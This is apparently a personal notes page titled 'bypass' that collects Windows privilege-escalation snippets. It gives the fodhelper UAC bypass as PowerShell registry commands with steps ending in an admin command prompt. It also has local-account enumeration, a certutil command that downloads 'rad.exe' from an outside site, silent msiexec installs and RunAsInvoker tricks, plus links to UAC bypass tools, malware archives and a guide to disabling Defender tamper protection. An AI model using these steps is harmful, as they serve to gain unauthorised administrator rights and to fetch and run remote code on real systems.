Friday, June 6, 2025

bypass

Powershell:

New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force

---------------------------------------------------

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force

---------------------------------------------------

WmiObject Win32_UserAccount -filter "LocalAccount=True" | Select-Object Name, FullName, Disabled


//Cmd => fodhelper

start cmd

type and run fodhelper in cmd prompt

now you have Admin cmd prompt open.





msiexec /quiet /qn /i sample2.msi

https://www.datacamp.com

https://www.makeuseof.com/hacks-stop-ssd-from-dying-prematurely

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1

https://github.com/gemini-security

https://github.com/winscripting/UAC-bypass

https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1



https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

https://github.com/hfiref0x/UACME

https://remnux.org


https://vx-underground.org

https://learn.microsoft.com/en-us/windows/win32/api/

https://github.com/screeck/YouTube



whoami /groups

whoami /priv

https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/

https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/


certutil -urlcache -split -f https://mojsajt.com/rad.exe



C:\Windows\System32\cmd.exe /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "C:\Program Files (x86)\yourprograme.exe""

https://blog.51sec.org/2021/02/windows-powershell-script-collection.html?expand_article=1


startuj.bat=

Set __COMPAT_LAYER=RunAsInvoker 

Start 7z2301-x64.exe

ili


cmd.exe /c "set __COMPAT_LAYER=RunAsInvoker && 7z2301-x64.exe"











Excel remoter